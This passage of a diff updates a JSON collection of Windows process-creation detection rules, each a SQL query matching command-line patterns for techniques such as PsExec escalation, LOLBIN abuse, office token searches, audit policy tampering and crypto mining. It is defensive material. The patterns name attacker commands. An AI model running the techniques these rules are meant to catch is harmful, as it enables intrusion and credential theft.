'\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "title": "Suspicious AgentExecutor PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "CL_LoadAssembly.ps1 Proxy Execution", - "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "title": "Add User to Local Administrators Group", + "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "status": "experimental", - "description": "Detects the use of a Microsoft signed script to execute commands and bypassing AppLocker.", - "author": "frack113", + "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" + "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" }, { - "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", - "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "title": "Hidden Powershell in Link File Pattern", + "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "status": "test", - "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", - "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", + "description": "Detects events that appear when a user click on a link file with a powershell command in it", + "author": "frack113", "tags": [ - "attack.t1218", - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "The process spawned by vsjitdebugger.exe is uncommon." + "Legitimate commands in .lnk files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" + "filename": "proc_creation_win_susp_embed_exe_lnk.yml" }, { - "title": "Active Directory Structure Export Via Csvde.EXE", - "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", + "title": "Suspicious Office Token Search Via CLI", + "id": "6d3a3952-6530-44a3-8554-cf17c116c615", "status": "experimental", - "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csvde_export.yml" + "filename": "proc_creation_win_susp_office_token_search.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", - "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", + "status": "experimental", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE '\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", + "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", - "author": "Florian Roth (Nextron Systems)", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_plink_susp_tunneling.yml" + "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" }, { - "title": "PsExec/PAExec Escalation to LOCAL SYSTEM", - "id": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "title": "Use of Squirrel.exe", + "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", "status": "experimental", - "description": "Detects suspicious commandline flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", + "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ - "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)", - "Users that debug Microsoft Intune issues using the commands mentioned in the official documentation; see https://learn.microsoft.com/en-us/mem/intune/apps/intune-management-extension" + "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND (CommandLine LIKE '%psexec%' ESCAPE '\\' OR CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sysinternals_psexec_paexec_escalate_system.yml" + "filename": "proc_creation_win_lolbin_squirrel.yml" }, { - "title": "WMI Backdoor Exchange Transport Agent", - "id": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", - "status": "test", - "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Windows App Activity", + "id": "f91ed517-a6ba-471d-9910-b3b4a398c0f3", + "status": "experimental", + "description": "Detects suspicious children of application launched from inside the WindowsApps directory. This could be a sign of a rogue \".appx\" package installation/execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\EdgeTransport.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Bin\\\\OleConverter.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND ((NewProcessName LIKE '%\\\\poweshell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%Base64%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + "filename": "proc_creation_win_susp_appx_execution.yml" }, { - "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", - "id": "c6c56ada-612b-42d1-9a29-adad3c5c2c1e", - "status": "test", - "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "title": "Computer System Reconnaissance Via Wmic.EXE", + "id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "status": "experimental", + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.discovery", + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%/logon:none%' ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%computersystem%' ESCAPE '\\')" ], - "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" + "filename": "proc_creation_win_wmic_recon_computersystem.yml" }, { - "title": "Suspicious Service Binary Directory", - "id": "883faa95-175a-4e22-8181-e5761aeb373c", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", + "id": "55f0a3a1-846e-40eb-8273-677371b8d912", "status": "test", - "description": "Detects a service binary running in a suspicious directory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.execution", + "attack.t1059", "attack.t1202" ], "falsepositives": [ @@ -21072,1832 +21133,1777 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\$Recycle.bin%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Contacts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Searches\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\') AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_service_dir.yml" + "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Suspicious Processes Spawned by WinRM", - "id": "5cc2cda8-f261-4d88-a2de-e9e193c86716", + "title": "Service StartupType Change Via PowerShell Set-Service", + "id": "62b20d44-1546-4e61-afce-8e175eb9473c", "status": "experimental", - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", + "description": "Detects the use of the PowerShell \"Set-Service\" cmdlet to change the startup type of a service to \"disabled\" or \"manual\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.execution", + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate WinRM usage" + "False positives may occur with troubleshooting scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR OriginalFileName = 'PowerShell.EXE') AND (CommandLine LIKE '%Set-Service%' ESCAPE '\\' AND CommandLine LIKE '%-StartupType%' ESCAPE '\\' AND (CommandLine LIKE '%Disabled%' ESCAPE '\\' OR CommandLine LIKE '%Manual%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_winrm_susp_child_process.yml" + "filename": "proc_creation_win_powershell_set_service_disabled.yml" }, { - "title": "Potential Crypto Mining Activity", - "id": "66c3b204-9f88-4d0a-a7f7-8a57d521ca55", - "status": "stable", - "description": "Detects command line parameters or strings often used by crypto miners", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS", + "id": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "status": "test", + "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", + "author": "blueteamer8699", "tags": [ - "attack.impact", - "attack.t1496" + "attack.discovery", + "attack.execution", + "attack.t1615", + "attack.t1059.005" ], "falsepositives": [ - "Legitimate use of crypto miners", - "Some build frameworks" + "Administrative activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --cpu-priority=%' ESCAPE '\\' OR CommandLine LIKE '%--donate-level=0%' ESCAPE '\\' OR CommandLine LIKE '% -o pool.%' ESCAPE '\\' OR CommandLine LIKE '% --nicehash%' ESCAPE '\\' OR CommandLine LIKE '% --algo=rx/0 %' ESCAPE '\\' OR CommandLine LIKE '%stratum+tcp://%' ESCAPE '\\' OR CommandLine LIKE '%stratum+udp://%' ESCAPE '\\' OR CommandLine LIKE '%LS1kb25hdGUtbGV2ZWw9%' ESCAPE '\\' OR CommandLine LIKE '%0tZG9uYXRlLWxldmVsP%' ESCAPE '\\' OR CommandLine LIKE '%tLWRvbmF0ZS1sZXZlbD%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt0Y3A6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdGNwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3RjcDovL%' ESCAPE '\\' OR CommandLine LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR OriginalFileName IN ('cscript.exe', 'wscript.exe')) AND CommandLine LIKE '%gatherNetworkInfo.vbs%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_crypto_mining_monero.yml" + "filename": "proc_creation_win_lolbin_gather_network_info.yml" }, { - "title": "Potential CommandLine Path Traversal Via Cmd.EXE", - "id": "087790e3-3287-436c-bccf-cbd0184a7db1", + "title": "UAC Bypass Using Event Viewer RecentViews", + "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", "status": "test", - "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", - "author": "xknow @xknow_infosec, Tim Shelton", + "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.defense_evasion", + 